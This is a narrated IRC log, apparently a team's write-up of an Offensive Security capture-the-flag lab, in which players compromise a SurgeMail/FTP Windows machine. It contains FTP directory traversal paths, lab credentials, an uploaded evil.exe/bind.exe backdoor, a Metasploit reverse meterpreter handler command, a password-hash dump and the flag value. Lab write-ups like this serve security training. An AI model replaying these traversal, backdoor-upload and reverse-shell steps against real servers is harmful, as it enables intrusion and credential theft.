CHAPTER 02 : Killing the n00bKiller

Chapter 2 - PART 01 : Searching the graves

Entring to the VPN we had to fix our objectives and that's the speciality of TecR0c :

[18:32] <@TecR0c> the target is actually
[18:32] <@TecR0c> http://192.168.6.67/
[18:32] <@TecR0c> muahahaha
[18:33] <@Sud0> hahahaha
[18:33] <@Sud0> np
[18:33] <@Sud0> :)
[18:33] <@mr_me> nice brother
[18:33] <@TecR0c> we are gonna own this !

Some minutes later a bige silence was in the irc channel :

[18:39] <@Sud0> anyone here ?
[18:40] <@mr_me> we are here
[18:40] <@mr_me> just working
[18:40] <@mr_me> my freind
[18:40] <@mr_me> :)
[18:42] <@Sud0> though
[18:42] <@Sud0> i lost connection
[18:42] <@Sud0> nothing was mooving here :)

As i said before, TecR0c was expert to select targets, so we have to change target again ;)

[18:47] <@TecR0c> 71 72 are the same aswell
[18:48] <@Sud0> i saw it
[18:48] <@ekse> hi guys
[18:48] <@Sud0> hi ekse
[18:49] <@TecR0c> you can ftp to 192.168.6.70
[18:49] <@TecR0c> anonymous
[18:50] <@mr_me> ftp access
[18:50] <@TecR0c> yep it windows 7 utimate
[18:51] <@Sud0> yes
[18:51] <@TecR0c> i think its 64bit aswell
[18:51] <@Sud0> directory traversal
[18:51] <@Sud0> not working

Always following TechR0c, he want to use a new ROP technique :)

[18:51] <@TecR0c> lets do ROP
[18:51] <@TecR0c> lol
[18:52] <@Sud0> hahaha
[18:53] <@Sud0> @TecR0c alll suregemail are post auth exploit

Then mr_me arrived with a new fresh, sweet and technical ideas :)

[19:25] <@Sud0> hola mr_me
[19:26] <@mr_me> Sud0: hola
[19:26] <@mr_me> ok so im abit stumped
[19:26] <@Sud0> ssup ? :)
[19:26] <@Sud0> hahah
[19:27] <@Sud0> what's happening ?
[19:27] <@mr_me> 6.67 is just login prompt
[19:27] <@mr_me> prompts
[19:27] <@Sud0> hahahaha yes
[19:27] <@mr_me> and 6.70 webmail
[19:27] <@mr_me> duno yet
[19:27] <@Sud0> yup :)
[19:27] <@mr_me> i might bruteforce a pop account
[19:27] <@mr_me> or ftp
[19:27] <@mr_me> but duno any undernsmae
[19:27] <@mr_me> usernames**

After That TecR0c did an extraordinary discovery using his ROP technique

[19:36] <@TecR0c> wdf
[19:36] <@TecR0c> its linux box
[19:36] <@_sinn3r> are you guys playing w/ CTF at the moment?
[19:37] <@Sud0> @mr_me not vuln on that
[19:37] <@Sud0> yes _sinn3r and u ?
[19:37] <@_sinn3r> at the moment, no
[19:37] <@TecR0c> its ubuntu 8.10
[19:37] <@TecR0c> ;)
[19:37] <@Sud0> what IP TecR0c ?
[19:37] <@_sinn3r> kinda busy with exploit-db... lots of tickets.
[19:38] <@TecR0c> 71
[19:38] <@_sinn3r> I did hear it's pretty nasty... a couple guys at exploit-db were working on the CTF labs.
[19:38] <@TecR0c> ah
[19:38] <@TecR0c> wait
[19:38] <@TecR0c> lol
[19:38] <@TecR0c> its my machine hehe
[19:38] <@TecR0c> =]
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@TecR0c> got excited for one sec
[19:38] <@TecR0c> :P
[19:40] <@Sud0> héhé
[19:41] <@Sud0> 71 ---> vista ultimate ;)

After analysing the machine, we agreed to make a nice plan :

[20:51] <@Sud0> @tecR0c 21 -------------> should be vuln to directory traversal
[20:52] <@TecR0c> so what we need to do ?
[20:52] <@Sud0> 1- got a directory traversal
[20:52] <@Sud0> here is the scenario
[20:53] <@Sud0> 1- directory traversal on Complete FTP
[20:53] <@Sud0> 2- Get an account on webmail
[20:53] <@Sud0> 3- use a remote exploit against webmail to get root (i ment shell)
[20:53] <@Sud0> 4- use a local root exploit against qualcomm popassd
[20:53] <@Sud0> got it ?
[20:53] <@mr_me> yeh
[20:54] <@mr_me> qualcom
[20:54] <@mr_me> we knew
[20:54] <@TecR0c> cool
[20:54] <@TecR0c> ok lets make this happenn

After 06 Hour of trying a Directory traversal as anonymous against machine 70 without success Lincoln came to save us :

[23:30] <@corelanc0d3r> doing full scan
[23:30] <@Lincoln> cd \..\..\
[23:31] <@Sud0> @Lincoln : not working with me
[23:31] <@Sud0> i tested it 10000 times
[23:32] <@Sud0> @Lincoln don't work cd \..\..\
[23:32] <@Lincoln> ftp> pwd
[23:32] <@Lincoln> 257 "/MyDocuments" is current directory.
[23:32] <@Lincoln> ftp> ls
[23:32] <@Lincoln> 200 PORT command successful.
[23:32] <@Lincoln> 150 Opening ASCII mode data connection for listing
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Music
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Pictures
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Videos
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 08 00:03 test
[23:32] <@Lincoln> 226 Transfer complete.
[23:32] <@Sud0> shit
[23:32] <@Lincoln> ftp> cd \..\..\

Lincoln explained us the problem, TecR0c finished it with a nice phrase

[23:35] <@Sud0> devil
[23:35] <@_sinn3r> I still can't get noobSeccret.txt.......... the damn thing just times out.
[23:35] <@Sud0> what pass ?
[23:35] <@Lincoln> killthen00b
[23:35] <@chap0> I mentioned it earlier but
[23:35] <@chap0> hahaha
[23:35] <@chap0> it was on the page they said to read the whole page
[23:35] <@chap0> haha
[23:35] <@chap0> :D
[23:35] <@chap0> anyway good going linc for bringing it to the light!
[23:35] <@_sinn3r> "Gateway Time-out
[23:35] <@_sinn3r> The gateway did not receive a timely response from the upstream server or application."
[23:36] <@Sud0> nice lol
[23:36] <@Sud0> where on the websitre Lincoln lol
[23:36] <@Lincoln> FTP Credentials are : devil / killthen00b
[23:36] <@Lincoln> under helpful hints on the bottom
[23:36] <@Lincoln> of info blog
[23:36] <@Sud0> hahahahaha
[23:37] <@Sud0> i'm so umb
[23:37] <@Sud0> i dumb
[23:37] <@Sud0> lol
[23:37] <@TecR0c> WTF

After a team work we discovered the default exe folder of surgemail to put our backdoor

[00:11] <@Lincoln> try cd /MyDocuments/....../....../....../..../....../surgemail/web
[00:11] <@TecR0c> 07 23:52:18.13:1876: IMAP 3.8k4-4, User connected (192.168.6.143) (192.168.6.71) socket=1588
[00:11] <@TecR0c> ok so the peolpe who have owned it must have to use imap aswell
[00:11] <@TecR0c> ;/
[00:17] <@Sud0> CGI did not respond correctly, it probably exited abnormally or the file may not exist or have +x access (bind.exe) ()
[00:18] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:21] <@mr_me> hey sudo
[00:21] <@mr_me> u have web root
[00:21] <@mr_me> ?
[00:22] <@_sinn3r> you think 192.168.6.72 supports ASP?
[00:22] <@_sinn3r> server: DManager........
[00:23] <@_sinn3r> nnnnnoope...
[00:23] <@Sud0> hum
[00:23] <@Sud0> yes
[00:23] <@Sud0> shit
[00:23] <@Sud0> but
[00:23] <@Sud0> i loaded
[00:23] <@Sud0> the exe
[00:23] <@Sud0> bind.exe
[00:23] <@Lincoln> yeah i missed that one lol
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:23] <@Lincoln> http://192.168.6.72/evil.html
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:24] <@_sinn3r> bindshell for what port?
[00:24] <@Sud0> 4444

09/05/2010 :

A new day and corelanc0d3r started thinking about new technologies and doing what he loves best : writing nice articles and blogs

[00:31] <@corelanc0d3r> trying some stuff
[00:31] <@corelanc0d3r> but
[00:31] <@corelanc0d3r> perhaps this may help
[00:31] <@corelanc0d3r> go to the admin page of surgemail
[00:31] <@corelanc0d3r> log in with admin account
[00:31] <@corelanc0d3r> corelanc0d3r
[00:31] <@corelanc0d3r> password
[00:31] <@corelanc0d3r> admimn
[00:31] <@corelanc0d3r> admin
[00:31] <@corelanc0d3r> you can create blogs
[00:32] <@corelanc0d3r> maybe we can do something with this

[00:33] <@corelanc0d3r> http://192.168.6.70/blogs/corelanc0d3r
[00:34] <@corelanc0d3r> hahaha

After That Lincoln gave us a nice shell :

[00:46] <@Lincoln> CAN YOU SAY WOOT
[00:46] <@Lincoln> msf exploit(mhandler) > exploit
[00:46] <@Lincoln> [*] Started reverse handler on 192.168.6.135:4444
[00:46] <@Lincoln> [*] Starting the payload handler...
[00:46] <@Lincoln> [*] Sending stage (748032 bytes) to 192.168.6.135
[00:46] <@Lincoln> [*] Meterpreter session 1 opened (192.168.6.135:4444 -> 192.168.6.135:44382)
[00:46] <@_sinn3r> whoa, how?
[00:46] <@corelanc0d3r> wtf
[00:46] <@corelanc0d3r> :D
[00:46] <@_sinn3r> how?
[00:47] <@TecR0c> wtf
[00:47] <@TecR0c> ohyeeeeee
[00:47] <@mr_me> fukn hell
[00:47] <@TecR0c> your the man
[00:47] <@TecR0c> =]
[00:47] <@_sinn3r> how how how how how
[00:47] <@chap0> lol
[00:47] <@mr_me> WOW

But it was not as nice as it looks like :

[00:48] <@Lincoln> ignore it guys
[00:48] <@Lincoln> no
[00:48] <@Lincoln> no
[00:48] <@Lincoln> i fucked up
[00:48] <@Lincoln> hahahaha
[00:48] <@corelanc0d3r> not worky ?
[00:48] <@Sud0> hahaha
[00:48] <@Sud0> :)
[00:48] <@Lincoln> no....
[00:48] <@Lincoln> too stupid to admit
[00:48] <@Lincoln> sorry guys ignore
[00:48] <@Sud0> your own machine
[00:48] <@Sud0> :)
[00:48] <@Lincoln> yep....
[00:48] <@Lincoln> hahahah
[00:48] <@_sinn3r> awwwwwwwwww......
[00:48] <@Lincoln> im sorry
[00:48] <@Lincoln> lol
[00:48] <@_sinn3r> :-)
[00:49] <@Lincoln> <------------- SUPER emabarrased After i was disconnected, with my unsuccessful bind shell, the team continue to work on killthen00b machine (one man can't make a team) there was a shell

[01:02] <@corelanc0d3r> ok - need a little help here
[01:02] <@corelanc0d3r> how do I set up metasploit
[01:02] <@corelanc0d3r> to listen for a reverse incoming meterpreter session
[01:02] <@corelanc0d3r> on let's say port 5555
[01:02] <@TecR0c> multi/handler
[01:03] <@TecR0c> use multi/handler
[01:03] <@TecR0c> show options
[01:03] <@_sinn3r> ./msfcli multi/handler payload=windows/meterpreter_reverse_tcp lhost=[your ip] lport=5555 E
[01:04] <@corelanc0d3r> failed Payload has not been selected
[01:04] <@_sinn3r> windows/meterpreter/reverse_tcp
[01:06] <@corelanc0d3r> reverting box again ?
[01:06] <@_sinn3r> two more people just got 50 pts......
[01:11] <@corelanc0d3r> bloody hell
[01:11] <@corelanc0d3r> rooted .70
[01:11] <@_sinn3r> how?
[01:11] <@corelanc0d3r> simple
[01:11] <@corelanc0d3r> really simple
[01:11] <@corelanc0d3r> ftp traversal
[01:11] <@corelanc0d3r> go to c:\surgemail\scripts
[01:11] <@corelanc0d3r> upload eveil
[01:11] <@corelanc0d3r> evil exe
[01:11] <@corelanc0d3r> call it from browserr
[01:11] <@corelanc0d3r> done

Here we are, using meterpreter, one of the glorius warriors opened a remote desktop

[01:21] <@_sinn3r> ok mr_me
[01:21] <@_sinn3r> do this
[01:21] <@_sinn3r> rdesktop 192.168.6.70
[01:21] <@_sinn3r> username: sinn3r
[01:21] <@_sinn3r> password: veryphat
[01:21] <@mr_me> woot
[01:21] <@mr_me> shell
[01:22] <@Lincoln> ahh sexy
[01:22] <@Lincoln> meterpreter > run hashdump
[01:22] <@Lincoln> [*] Obtaining the boot key...
[01:22] <@Lincoln> [*] Calculating the hboot key using SYSKEY 8cbc4040791fac141f35cba5f197d50f...
[01:22] <@Lincoln> [*] Obtaining the user list and keys...
[01:22] <@Lincoln> [*] Decrypting user keys...
[01:22] <@Lincoln> [*] Dumping password hashes...
[01:22] <@Lincoln> Administrator:500:aad3b435b51404eeaad3b435b51404ee:07eaa2b600669980aa3268fd8cc3f0e5:::
[01:22] <@Lincoln> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[01:22] <@Lincoln> devil:1001:aad3b435b51404eeaad3b435b51404ee:3cc3bac4b37e26d8208469533c59e2c6:::
[01:22] <@Lincoln> sinn3r:1002:aad3b435b51404eeaad3b435b51404ee:05597a07ce55307b3e6a3bd1a7abe12d:::
[01:22] <@Lincoln> going to run those through offsec cracker

And finally they got the beast down

[01:28] <@_sinn3r> I don't see a proof.txt in devil's desktop
[01:28] <@_sinn3r> Peter, what am I supped to look for?
[01:30] <@_sinn3r> ?
[01:30] <@corelanc0d3r> Administrators Desktop
[01:30] <@_sinn3r> ok... damn, just the wrong desktop
[01:30] <@Lincoln> can someone rehit evil.exe
[01:30] <@Lincoln> on .70
[01:30] <@_sinn3r> hit
[01:30] <@Lincoln> thanks
[01:32] <@Lincoln> doh
[01:32] <@Lincoln> no tftp on win7
[01:32] <@Lincoln> thats right
[01:32] <@_sinn3r> you need to manually enable it
[01:32] <@Lincoln> sinner you still on rdp?
[01:32] <@_sinn3r> not anymore. go ahead.
[01:33] <@_sinn3r> meterpreter > cat proof.txt
[01:33] <@_sinn3r> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> oO rolf
[01:34] <@corelanc0d3r> does anyone know if there is only one proof file per machine ?
[01:34] <@Lincoln> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> k got it
[01:34] <@_sinn3r> woohoo 50 pts
[01:35] <@corelanc0d3r> nicey